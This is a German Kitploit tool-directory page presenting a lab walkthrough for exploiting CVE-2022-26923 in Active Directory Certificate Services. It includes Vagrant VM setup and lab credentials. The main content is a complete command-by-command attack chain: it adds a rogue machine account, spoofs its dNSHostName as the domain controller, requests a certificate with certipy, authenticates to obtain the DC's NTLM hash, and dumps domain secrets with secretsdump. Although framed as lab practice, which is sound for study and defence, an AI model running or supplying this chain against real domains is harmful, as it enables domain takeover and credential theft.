Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26923-rayng — Ausnutzung für CVE-2022-26923 | Kitploit
Tools/GitHubGitHub/rayngnpc/cve-2022-26923-rayng
Passwort-CrackingPrivilege EscalationSchwachstellenanalyseExploitationPenetrationstestsAuthentifizierungLernen & BildungLabs & Praxis
GitHubrayngnpc/cve-2022-26923-rayng

CVE-2022-26923-rayng

Ausnutzung für CVE-2022-26923

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploiting CVE-2022-26923: Privilegieneskalation der Zertifizierungsstelle

Übersicht

CVE-2022-26923 ist eine Schwachstelle in Active Directory Certificate Services (AD CS), die es einem Angreifer ermöglicht, Privilegien durch Missbrauch der zertifikatsbasierten Authentifizierung zu eskalieren. Diese Anleitung beschreibt die Schritte zur Ausnutzung dieser Schwachstelle mit Impacket und Certipy.


Tabelle der Anmeldedaten

Virtuelle MaschineBenutzernamePasswort
Windows ServerAdministrator!@windowsadmintest101
Windows Servertestuser$Vulnerable139
Kali-Linux VMvagrantvagrant

Schritt 1: Repository klonen und virtuelle Maschinen einrichten

Klonen Sie zunächst das Repository mit den erforderlichen Dateien:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng

Virtuelle Maschinen einrichten

Das Repository enthält zwei Ordner, jeder mit einer Vagrantfile zur Bereitstellung virtueller Maschinen. Sie müssen Vagrant auf Ihrem Host-Rechner installieren, bevor Sie fortfahren.

Vagrant installieren

Für Windows

Laden Sie Vagrant von hier herunter und installieren Sie es. Oder installieren Sie es mit PowerShell:

root@kitploit:~
choco install vagrant
Für Linux
root@kitploit:~
sudo apt update && sudo apt install vagrant -y

Windows Server 2022 VM

Navigieren Sie zum Verzeichnis WindowsServer2022:

root@kitploit:~
cd WindowsServer2022
vagrant up

Dies lädt die Windows Server 2022 VM in VirtualBox herunter und richtet sie ein.

Kali Linux VM

Navigieren Sie zum Verzeichnis Kali-LinuxVM:

root@kitploit:~
cd Kali-LinuxVM
vagrant up

Schritt 2: Konfigurieren des virtuellen Netzwerks

Da der Exploit ein NAT-Netzwerk erfordert, konfigurieren Sie VirtualBox wie folgt:

Unter Windows

Stellen Sie vor dem Ausführen des folgenden Befehls sicher, dass VBoxManage zu Ihren Umgebungsvariablen hinzugefügt wurde. Falls nicht, führen Sie den Befehl mit dem vollständigen Pfad aus:

NAT-Netzwerk hinzufügen

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Wenn VBoxManage nicht erkannt wird, verwenden Sie:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Unter Linux

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Stellen Sie sicher, dass beide VMs in VirtualBox überprüft werden und dass sie dem Netzwerkadapter NatNetwork - NatNet1 zugewiesen sind.

Sie können ein NAT-Netzwerk mit einem anderen Namen erstellen, aber es muss im IP-Bereich 10.0.2.0/24 liegen.


Schritt 3: Hosts-Datei ändern

Stellen Sie vor dem Fortfahren sicher, dass sowohl Windows Server 2022 als auch Kali Linux VM eingeschaltet sind.

Greifen Sie auf die Kali Linux VM zu, um den Angriff zu starten.

Aktualisieren Sie Ihre /etc/hosts-Datei, um die IP des Domänencontrollers zuzuordnen:

root@kitploit:~
sudo nano /etc/hosts

Fügen Sie den folgenden Eintrag hinzu:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

Speichern und schließen.


Schritt 4: Umgebung einrichten

Navigieren Sie zum Verzeichnis CVE-26923 und aktivieren Sie die Python-Virtual-Umgebung:

root@kitploit:~
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate

Schritt 5: Einen Computer zur Domäne hinzufügen

Mit dem addcomputer-Dienstprogramm von Impacket:

root@kitploit:~
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'

Schritt 6: PCTEST1 dem Domänencontroller zuweisen

Methode 1: Mit SSH (falls OpenSSH auf dem Zielserver installiert ist)

root@kitploit:~
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname

Methode 2: Ohne SSH (mit Impacket & BloodyAD)

Überprüfen Sie die Domänencomputer:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

Navigieren Sie zum Verzeichnis bloodyAD und verwenden Sie bloodyAD.py, um PCTEST1 zur Domäne hinzuzufügen:

root@kitploit:~
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'

Überprüfen Sie, ob PCTEST1 der Domäne zugewiesen wurde:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

Schritt 7: Exploit-Prozess

Auffinden angreifbarer Zertifikate

Verwenden Sie Certipy, um angreifbare Zertifikate zu finden:

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'

Anfordern eines Zertifikats

Fordern Sie ein Maschinenzertifikat mit Certipy an:

root@kitploit:~
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA

Authentifizierung mit dem Zertifikat

Authentifizieren Sie sich mit dem erhaltenen Zertifikat:

root@kitploit:~
certipy auth -pfx server2022.pfx

Schritt 8: Extrahieren der NTLM-Hashes

Nach dem Ausführen des certipy auth-Befehls werden zwei Hashes angezeigt. Der rechte Hash wird für die NTLM-Authentifizierung verwendet.

Beispiel-Hash-Ausgabe:

root@kitploit:~
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7

Verwenden Sie den extrahierten NTLM-Hash zum Dumpen von Anmeldedaten:

root@kitploit:~
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7

Damit ist die vollständige Angriffskette zur Ausnutzung von CVE-2022-26923 abgeschlossen.

Tool herunterladen